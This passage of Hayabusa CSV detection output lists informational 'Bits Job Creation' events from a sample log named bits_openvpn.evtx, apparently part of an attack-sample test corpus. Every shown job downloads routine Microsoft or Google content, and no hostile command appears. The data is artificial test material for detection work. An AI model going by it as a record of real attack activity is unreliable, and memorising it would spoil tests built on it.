Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 
00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification 
Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: 
http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: 
http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:25.377 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:59.449 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:42.355 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 